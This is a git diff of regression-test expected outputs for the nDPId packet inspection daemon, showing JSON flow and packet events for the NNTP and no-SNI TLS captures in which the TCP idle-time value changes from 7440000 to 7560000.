00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} diff --git a/test/results/nntp.pcap.out b/test/results/nntp.pcap.out index bfe0c6847..16fa8af72 100644 --- a/test/results/nntp.pcap.out +++ b/test/results/nntp.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nntp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1258844926423} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258844926423,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258844926423,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258844926423,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258844926423,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":4921,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1258844993785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/no_sni.pcap.out b/test/results/no_sni.pcap.out index acc28618c..0b9a5994e 100644 --- a/test/results/no_sni.pcap.out +++ b/test/results/no_sni.pcap.out 
@@ -1,60 +1,60 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"no_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1604822444474} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} 
-00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} 
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1604822447249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447249,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcm0AbsYxEgFAAAAALAC\/\/\/0wAAAAgQFtAEDAwYBAQgKKlL7WQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm1AbvwpFrxAAAAALAC\/\/+HSQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm2AbtLPosXAAAAALAC\/\/\/8iAAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} 